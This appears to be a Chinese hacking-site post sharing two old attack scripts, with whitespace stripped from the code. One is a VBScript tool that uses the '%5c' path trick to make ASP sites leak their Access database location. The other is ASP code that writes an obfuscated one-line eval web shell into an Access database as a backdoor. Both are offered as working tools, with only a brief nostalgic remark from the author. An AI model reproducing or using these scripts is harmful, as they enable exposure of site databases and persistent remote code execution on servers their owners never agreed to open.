DimxStatus,tStatus,vServer,vHeader,vRsBody
GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")
IfGetError=""Then
MsgBox("输入错误,程序结束!")
WScript.Quit
EndIf
GetError=StrReverse(GetError)
Tem2=0
ForI=1ToLen(GetError)
IfMid(GetError,I,1)=Chr(47)AndTem2=0Then
Temp=Temp&"c5%"
Tem2=Tem2+1
Else
Temp=Temp&Mid(GetError,I,1)
EndIf
Next
GetError=StrReverse(Temp)
CallxmlPost(GetError)
ErrorText=vServer&""&xStatus
BaseSaver=GetStr(vRsBody,"找不到文件'","'。</font>"&Chr(10))
IfBaseSaver="[None]"Then
BaseSaver=GetStr(vRsBody,"<fontface="&Chr(34)&"宋体"&Chr(34)&"size=2>'","'不是一个有效的路径。")
EndIf
IfBaseSaver="[None]"Then
BaseSaver=GetStr(vRsBody,"打开注册表关键字'","'。</font>")
EndIf
IfBaseSaver="[None]"Then
AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'style='border:0pt;margin-left:5pt'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&vRsBody&"</textarea>"
Else
AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'style='border:0pt;margin-left:5pt'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&BaseSaver&"</textarea>"
EndIf
CallOpenWin(AllReturn)
SetWHShell=WScript.CreateObject("WScript.Shell")
WHShell.AppActivate"Mappath出错获取数据库地址Lilo"
'WHShell.SendKeys("%{TAB}")
SetWHShell=Nothing
FunctionURLEncoding(vstrIn)
strReturn=""
Fori=1ToLen(vstrIn)
ThisChr=Mid(vStrIn,i,1)
IfAbs(Asc(ThisChr))<&HFFThen
strReturn=strReturn&ThisChr
Else
innerCode=Asc(ThisChr)
IfinnerCode<0Then
innerCode=innerCode+&H10000
EndIf
Hight8=(innerCodeAnd&HFF00)&HFF
Low8=innerCodeAnd&HFF
strReturn=strReturn&"%"&Hex(Hight8)&"%"&Hex(Low8)
EndIf
Next
URLEncoding=strReturn
EndFunction
Functionbytes2BSTR(vIn)
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,i,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction
FunctionxmlPost(iURL)
OnErrorResumeNext
iPost=URLEncoding(iPost)
SetxPost=CreateObject("Microsoft.XMLHTTP")
xPost.open"POST",iURL,False
xPost.Send
xStatus=xPost.Status
tStatus=xPost.StatusText
vServer=xPost.GetResponseHeader("Server")
vHeader=xPost.GetAllResponseHeaders
vRsBody=bytes2BSTR(xPost.responseBody)
SetxPost=Nothing
EndFunction
FunctionGetStr(vString,iString,dString)
vSum=inStr(vRsBody,iString)
IfvSum=0ThenGetStr="[None]":ExitFunction
eSum=inStr(vSum,vRsBody,dString)
IfeSum=0ThenGetStr="[None]":ExitFunction
GetStr=Mid(vRsBody,vSum+Len(iString),eSum-vSum-Len(iString))
EndFunction
FunctionIntToStr(vNum,vLen)
IfLen(vNum)>=vLenThenIntToStr=vNum:ExitFunction
ForI=1TovLen-Len(vNum)
IntToStr=IntToStr&"0"
Next
IntToStr=IntToStr&CStr(vNum)
EndFunction
FunctionGetSplit(unStr,vaStr,Mode)
aTemp=Split(unStr,vaStr)
bTemp=Ubound(aTemp)
SelectCaseMode
Case-1:GetSplit=aTemp
Case-2:GetSplit=bTemp
EndSelect
IfMode<0ThenExitFunction
IfMode>bTempThenGetSplit=False:ExitFunction
IfMode>=0ThenGetSplit=aTemp(Mode)
EndFunction
FunctionOpenWin(vTTv)
SetIE=WScript.CreateObject("InternetExplorer.Application")
IE.Navigate"about:blank"
IE.Visible=1
IE.ToolBar=0
IE.StatusBar=0
IE.Width=500
IE.Height=335
DoWhile(IE.Busy):Loop
SetDoc=IE.Document
Doc.Open
Execute"Doc.Writeln"&Chr(34)&vTTv&Chr(34)
Doc.Close
SetIE=Nothing
EndFunction
另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?
<%
db="0123.asp"'这里改成您的数据库地址
setconn=server.createobject("Adodb.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath(db)
conn.openconnstr
'添加notdownload表
conn.execute("createtablenotdownload(notdownoleobject)")
'写入<%数据
setrs=server.createobject("adodb.recordset")
sql="select*fromnotdownload"
rs.opensql,conn,1,3
rs.addnew
rs("notdown").appendchunk(chrB(asc("<"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(""))&chrB(asc("r"))&chrB(asc("u"))&chrB(asc("n"))&chrB(asc("a"))&chrB(asc("t"))&chrB(asc("="))&chrB(asc("s"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc("v"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc(""))&chrB(asc("l"))&chrB(asc("a"))&chrB(asc("n"))&chrB(asc("g"))&chrB(asc("u"))&chrB(asc("a"))&chrB(asc("g"))&chrB(asc("e"))&chrB(asc("="))&chrB(asc("j"))&chrB(asc("a"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">"))&chrB(asc("e"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("l"))&chrB(asc("("))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("."))&chrB(asc("f"))&chrB(asc("o"))&chrB(asc("r"))&chrB(asc("m"))&chrB(asc("("))&chrB(asc("'"))&chrB(asc("#"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("+"))&chrB(asc("'"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("<"))&chrB(asc("/"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">")))
rs.update
rs.close
setrs=nothing
'关闭连接
conn.close
setconn=nothing
%>
【N年前的两个脚本%5c暴库】相关文章: